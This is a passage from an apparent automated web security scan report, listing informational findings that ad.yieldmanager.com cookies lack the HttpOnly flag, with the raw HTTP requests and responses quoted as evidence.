!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=pR#?yN0FYbx1Nl=; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~"; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00A>TxV3; ih="b!!!!3!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^!4cvD!!!!#=3r-A"; vuday1=%)0sH!!w[/N0FYbmLc2E; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:18 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!7!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!#=3rv_!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!%=3rvx!4cvD!!!!#=3r-A"; path=/; expires=Fri, 06-Sep-2013 14:15:18 GMT
Set-Cookie: bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!'=3rvx!$?i5!!!!%=3`c_"; path=/; expires=Fri, 06-Sep-2013 14:15:18 GMT
Set-Cookie: vuday1=Ajz6(%)0sK!!w[/N0FYbx/X^4; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvx=43os!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!!!!%!?5%!%5XA1![:Z-!#gyo!(_lN~~~~~~=3rv_~~!#%s?!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!!NB!#%sB!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!.vL!#,Uv!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!.vL"; path=/; expires=Fri, 06-Sep-2013 14:15:18 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5Jkn_b<_ENa#9i; path=/; expires=Tue, 13-Sep-2011 12:48:14 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:15:18 GMT
Pragma: no-cache
Content-Length: 936
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834543);}
</script><script type="t
...[SNIP]...

9.7. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!#!4B$-!!!!#=3s!8"; path=/; expires=Fri, 06-Sep-2013 14:19:56 GMT
vuday1=Ajz6%N0FYb/Ve)m; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
pv1="b!!!!%!#%s?!!E)$!$`hJ!4B$-!%we^!!!!$!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3s!8=6$D>!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!!!!$!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3s!8=6$D>!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!!!!$!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3s!8=6$D>!!.vL"; path=/; expires=Fri, 06-Sep-2013 14:19:56 GMT
BX=ei08qcd75vc4d&b=3&s=8s&t=246"; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
liday1=k`5EVN0FYbSKY0(; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?Z=234x60&cb=1315405032840970&S=14494091&i=303498&ycg=&ypos=HB&yprop=au%5fnews&yrc=&yyob=&_salt=4189805891&B=10&u=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fbusiness%2F&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=234x60&site=303498&section_code=14494091&cb=1315405032840970&yrc=&ycg=&yyob=&yprop=au_news&ypos=HB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O; ih="b!!!!8!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=Ajz6)%)0sK!!w[/N0FYblQtVO; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!!NB!#%sB!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!.vL!#,Uv!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!.vL"; BX=ei08qcd75vc4d&b=3&s=8s&t=246; liday1=o?FeWFA=Es<9:^QpR#?yN0FYbE#i7!

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0228.rm.sp2
Set-Cookie: ih="b!!!!#!4B$-!!!!#=3s!8"; path=/; expires=Fri, 06-Sep-2013 14:19:56 GMT
Set-Cookie: vuday1=Ajz6%N0FYb/Ve)m; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!#%s?!!E)$!$`hJ!4B$-!%we^!!!!$!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3s!8=6$D>!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!!!!$!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3s!8=6$D>!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!!!!$!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3s!8=6$D>!!.vL"; path=/; expires=Fri, 06-Sep-2013 14:19:56 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246"; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=k`5EVN0FYbSKY0(; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:19:56 GMT
Pragma: no-cache
Content-Length: 1321
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<object type=\"application/x-shockwave-flash\" data=\"http://content.yieldmanager.edgesuite.net/atoms/14/8d/69/e5/148d69e533c1134c3b11f6d485608.swf?clickTAG=http%3A%2F%2Fad%2Eyieldmana
...[SNIP]...

9.8. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=uid=120c96ba-d95c-11e0-892c-78e7d1f597ec&_hmacv=1&_salt=3290410661&_keyid=k1&_hmac=735fbfb6cb891455e36ca5a96d44c23893ec693b; path=/; expires=Fri, 07-Oct-2011 14:17:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=606x120&cb=1315404889357362&S=14684958&i=303498&ycg=&ypos=ECLIP&yprop=au%5fnews&yrc=&yyob=&_salt=513613156&B=10&u=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=606x120&site=303498&section_code=14684958&cb=1315404889357362&yrc=&ycg=&yyob=&yprop=au_news&ypos=ECLIP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O; pv1="b!!!!)!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!!!!%!?5%!%5XA1![:Z-!#gyo!(_lN~~~~~~=3rv_~~"; ih="b!!!!5!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!#=3rv_!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=Ajz6%%)0sJ!!w[/N0FYbNl+WV; BX=ei08qcd75vc4d&b=3&s=8s&t=246; liday1=FA=Er<9:^PpR#?yN0FYbn@M@W

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:08 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0338.rm.sp2
Set-Cookie: uid=uid=120c96ba-d95c-11e0-892c-78e7d1f597ec&_hmacv=1&_salt=3290410661&_keyid=k1&_hmac=735fbfb6cb891455e36ca5a96d44c23893ec693b; path=/; expires=Fri, 07-Oct-2011 14:17:08 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:17:08 GMT
Pragma: no-cache
Content-Length: 995
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"120\" width=\"606\" src=\"http://ad.yieldmanager.com/iframe3?WaUDAJi
...[SNIP]...

9.9. http://adsfac.us/ag.asp previous next

